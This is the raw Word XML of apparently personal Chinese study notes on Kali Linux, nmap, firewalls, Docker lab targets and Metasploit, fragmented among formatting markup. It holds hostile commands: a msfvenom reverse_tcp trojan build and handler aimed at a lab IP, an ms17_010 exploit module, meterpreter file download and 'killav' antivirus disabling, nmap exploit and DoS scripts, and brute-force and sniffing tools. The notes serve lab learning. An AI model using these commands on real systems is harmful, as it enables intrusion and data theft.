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连接：ssh    IP地址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kali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进入vi编译模式 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退出esc+:wq(保存退出)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esc+:q!(强制退出)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su+密码(进入管理员权限)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 -lvp 端口号(对端口进行监听)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nc  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>192.168.52.140</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 端口号 （接收端口信）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传输文件：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 -lvp 6666 &gt;2.txt(接收方)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mabma.txt(创建文件)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 IP地址 端口号 &lt;mabma.txt(发送方)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93315" cy="851535"/>
            <wp:effectExtent l="0" t="0" r="6985" b="5715"/>
            <wp:docPr id="1" name="图片 1" descr="屏幕截图 2024-10-15 100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15 1007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kali换源  1.在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"https://developer.aliyun.com/mirror/"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阿里巴巴开源镜像站-OPSX镜像站-阿里云开发者社区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进行查找源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使用命令记事本打开配置文件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mousepad /etc/apt/sources.list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将复制的源换到配置文件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apt update    更新换好源的配置文件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3675" cy="3024505"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="2" name="图片 2" descr="屏幕截图 2024-10-15 120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0-15 1201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 (清屏)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Win+r 输入mstsc (打开远程桌面设置)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574925"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
            <wp:docPr id="3" name="图片 3" descr="屏幕截图 2024-10-15 142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0-15 1422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nmap 192.168.52.137 -O -sV -T4 -sS -p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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Open(打开)   closed(关闭)   filtered(过滤，一般是防火墙过滤)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985645"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="4" name="图片 4" descr="屏幕截图 2024-10-15 15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0-15 1544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7以上防火墙命令：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开机启动防火墙：systemctl enable firewalld.service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开启禁用防火墙：systemctl disable firewalld.service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启动防火墙：systemctl start firewalld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关闭防火墙：systemctl stop firewalld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检查防火墙状态：systemctl status firewalld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Windows关闭防火墙  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>netsh advfirewall set allprofiles state off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查看防火墙状态： netsh advfirewall show allprofiles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Windows 打开防火墙   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">netsh advfirewall set allprofiles state </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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--script=exploit IP地址（利用知道的漏洞入侵系统）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--script=dos IP地址(拒绝服务攻击)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nmap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"http://www.baidu.com(查看网址状态)"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www.baidu.com(查看网址状态)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netstat -ano</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(看Windows端口状态)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Kali关闭防火墙：  apt-get update         #获取更新包/更新软件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安装ufw命令：  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>apt-get install ufw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检测防火墙状态：   ufw status   防火墙版本：  ufw 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启动防火墙：  ufw enable   关闭防火墙：  ufw disable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禁止所有访问：  ufw default deny   开放22/TCP端口：  ufw allow 22/tcp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禁止外部访问：  ufw deny 3306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允许此IP访问所有的本机端口：ufw allow from 192.168.1.100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Kali爆破工具xhydra 回车打开工具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vi charset.lst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（crunch的生成密码配置文件）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ettercap -G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（打开ettercap截取网站软件）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install 软件包           //安装软件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remove 软件包          //卸载软件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在centos中打开python命令     python2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退出：exit(0)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 8中配置yum源：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进入目录：cd /etc/yum.repos.d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         //查看当前目录的所有文件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-rf ./*  //删除当前的所有文件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下载镜像源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-O /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-8.repo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 //查看文件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clean all   //清除所有文件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makecache   //建立缓存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repolist  //查看yum仓库信息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搭建靶场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查看镜像：  docker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查看容器：   docker ps -a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查看靶场镜像：docker search 靶场名（dvwa）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下载镜像：  docker pull 镜像名称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网络查找换源命令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查看docker系统信息：  docker info   查看状态信息：docker ps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查看镜像：docker images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安装镜像：docker pull 镜像名称（alpine ,centos,ubuntu）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运行镜像：docker run -dit --name=dawa -p 10000:80 镜像名称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关闭镜像：docker stop 用docker ps -a 查到的镜像ID号填写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删除镜像：docker rm -f 用docker ps -a 查到的镜像ID号填写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#系统命令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docker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#启动docker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stop docker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#停止docker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restart docker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#重启docker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docker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#设置docker开机自启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#基本命令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version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#查看docker版本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info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#查看docker详细信息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--help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#查看docker命令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#镜像命令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images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#查看docker镜像列表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images -a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#列出本地所有镜像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images --digests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#显示镜像的摘要信息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search redis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#从Docker Hub上查找redis镜像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pull redis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#从Docker Hub上下载redis镜像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rmi 373f0984b070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#删除IMAGE ID 为373f0984b070的镜像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#运行命令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#-p 6379:6379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端口映射：前表示主机部分,后表示容器部分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在后台运行容器（不进入终端）并打印容器ID/容器名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#--name myredis表示自定义容器名为myredis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-p 6379:6379 --name myredis redis:latest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#根据镜像创建并运行容器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#容器命令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container ls 或 docker ps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#查看正在运行的容器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container ls -a 或 docker ps -a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#列出所有容器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container start 容器ID 或 容器名称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#启动容器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容器ID 或 容器名称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#启动容器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container stop 容器ID 或 容器名称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#停止容器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stop 容器ID 或 容器名称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#停止容器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container rm 容器ID 或 容器名称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#删除容器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rm 容器ID 或 容器名称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#删除容器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container logs -f 容器ID 或 容器名称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#查看容器日志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exec -it name /bin/bash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#进入name（容器名/id）中开启交互式的终端，exit退出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安装docker-compose搭建靶场：apt install docker-compose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metasploit使用介绍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数据库初始化：msfdb init    启动：  mfsconsole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打开端口扫描：db_nmap     查看端口扫描：db_nmap -h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列出可以用的端口扫描：search portscan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半开扫描：use auxiliary/scanner/portscan/syn   返回上一级：back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查看半开扫描设置：show options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端口半开扫描：msf6 auxiliary(scanner/portscan/syn) &gt; set rhosts 192.168.52.8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use exploit/windows/smb/ms17_010_psexec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生成木马命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.12 LPORT=1111 -f exe &gt; windows.exe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用于访问和使用Metasploit的插件运行：msfconsole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exploit/mulit/handler       set payload windows/shell/reverse_tcp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LhOST 192.168.52.12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">     set lport 1111    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sessions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出现meterpreter你就已经成功的入侵的对方的电脑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Metasploit框架介绍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exploits-査看所有可用的渗透攻击程序代码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auxiliary-查看所有可用的辅助攻击工具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[show ]options/advanced-查看该模块可用选项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payloads-查看该模块适用的所有载荷代码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targets-查看该模块适用的攻击目标类型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search-根据关键字搜索某模块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info-显示某模块的详细信息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use-使用某渗透攻击模块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back-回退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set/unset-设置/禁用模块中的某个参数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setg/unsetg-设置/禁用适用于所有模块的全局参数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save-将当前设置值保存下来，以便下次启动MSF终端时仍可使用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meterpreter利用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meterpreter常用命令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meterpreter&gt;background 放回后台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meterpreter&gt;exit 关闭会话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meterpreter&gt;help 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meterpreter&gt;sysinfo系统平台信息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meterpreter&gt;screenshot 屏幕截取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meterpreter&gt;shell 命令行shell(exit退出)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meterpreter&gt;getlwd 查看本地目录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meterpreter&gt;lcd 切换本地目录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meterpreter&gt;getwd 查看目录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meterpreter&gt;ls 查看文件目录列表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meterpreter&gt;cd切换目录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meterpreter&gt;rm 删除文件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meterpreter&gt;download C:\\1.txt 1.txt 下载文件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meterpreter&gt;upload /var/www/wce.exe wce.exe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上传文件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meterpreter&gt;search-dc:-f*.doc 搜索文件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meterpreter&gt;execute-fcmd.exe-i 执行程序/命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meterpreter&gt;ps 查看进程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meterpreter&gt;getuid 查看当前用户权限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meterpreter&gt;run killav 关闭杀毒软件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meterpreter&gt;run getqui-e 启用远程桌面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meterpreter &gt;portfwd add-1234 -p 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目标IP&gt; 端口转发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修改所属组：chown 所有者:所属组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查看开放网络端口：netstat -an        (LISTEN)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下载网页静态资源：wget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"http://www.baidu.com/文件名"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http://www.baidu.com/文件名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（存储到文件中）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输出内容：echo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退出终端：exit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删除所有权限：chmod a-rwx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添加所有权限：chmod a+rwx 文件名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95F94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F495F94"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val="第%1章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  <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="3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  <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="4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  <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="5"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.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346D5638"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="346D5638"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:pStyle w:val="17"/>
      <w:lvlText w:val="第%1章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  <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0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  <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0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  <w:sz w:val="28"/>
        <w:szCs w:val="28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56FF1349"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56FF1349"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:pStyle w:val="16"/>
      <w:lvlText w:val="第%1章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  <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0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  <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0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  <w:sz w:val="28"/>
        <w:szCs w:val="28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52584"/>
    <w:rsid w:val="06F65E02"/>
    <w:rsid w:val="0A8F1F3F"/>
    <w:rsid w:val="0B961DE6"/>
    <w:rsid w:val="170D5898"/>
    <w:rsid w:val="1AA3649D"/>
    <w:rsid w:val="2E48472B"/>
    <w:rsid w:val="33B62DD4"/>
    <w:rsid w:val="393D244C"/>
    <w:rsid w:val="3E8C2BA7"/>
    <w:rsid w:val="407264AC"/>
    <w:rsid w:val="42591E0C"/>
    <w:rsid w:val="4C252584"/>
    <w:rsid w:val="59106A0D"/>
    <w:rsid w:val="5FEE2F32"/>
    <w:rsid w:val="651106D5"/>
    <w:rsid w:val="6DB93A16"/>
    <w:rsid w:val="72A0394A"/>
    <w:rsid w:val="782E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pageBreakBefore/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="0"/>
      </w:tabs>
      <w:spacing w:before="100" w:beforeLines="100" w:beforeAutospacing="0" w:after="100" w:afterLines="100" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="431" w:hanging="431" w:firstLineChars="0"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
      <w:kern w:val="44"/>
      <w:sz w:val="36"/>
      <w:szCs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paragraph" w:customStyle="1" w:styleId="16">
    <w:name w:val="样式6"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="17">
    <w:name w:val="样式7"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="标题 1 Char"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
      <w:kern w:val="44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2024-10-13T06:30:00Z</dcterms:created>
  <dc:creator>漩涡凌风</dc:creator>
  <cp:lastModifiedBy>漩涡凌风</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-19T06:22:55Z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